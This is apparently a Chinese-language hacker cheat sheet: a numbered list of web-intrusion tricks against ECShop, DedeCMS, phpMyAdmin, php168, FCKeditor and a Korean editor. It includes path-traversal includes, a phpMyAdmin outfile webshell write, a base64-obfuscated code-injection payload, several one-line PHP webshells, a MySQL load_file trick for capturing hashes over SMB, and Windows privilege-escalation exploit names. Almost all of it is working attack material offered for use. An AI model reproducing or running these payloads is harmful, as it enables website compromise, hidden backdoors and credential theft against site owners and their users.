1,ecshop magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00. 注册 然后上传gif欺骗文件 http://www.lpboke.com/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00
2,dede 5.3以下 找后台 include/dialog/select_soft.php
3,phpmyamdin后台拿shell phpMyAdmin/sql.php?db=test&table=a&printview=1&sql_query=select%20cmd%20from+a%20into%20outfile
%20'E:\\test1.php';&display_text=F&token=dc49fb24f86a6dc2b996b5d4211cccb4
4,韩国某编辑器爆路径漏洞 webedit/PopupWin/Editor_InsertImage.php?upload=ok
5,token 漏洞补丁号 KB956572 Churrasco kb952004 传说的长老漏洞MS11-011 KB2393802
6,内网渗透时如果MYSQL不是SYSTEM启动的。。 而是由别的账号启动的话。本机开个共享,开个CAIN。。 MYSQL里面执行load_file('\\\\ip\c$\a.txt') 可以抓到目标服务器的HALF HASH.。
7,/fckeditor/_samples/default.html 可以找到上传后的路径
8,生成一句话到上级目录 <?php fputs(fopen("..".DIRECTORY_SEPARATOR."r.php","w"),"<?eval(\$_POST[r]);?>")?>
9,php168 member/post.php?only=1&showHtml_Type[bencandy][1]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}&aid=1&job=endHTML c.php c
10,执行cmd命令的php语句 <?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?> http://localhost/a.php?cmd=dir
11,<?fputs(fopen('heige.php','w+'),'<?php eval($_POST[cmd])?>');?>
12,C:\windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe -i
Thx 末日。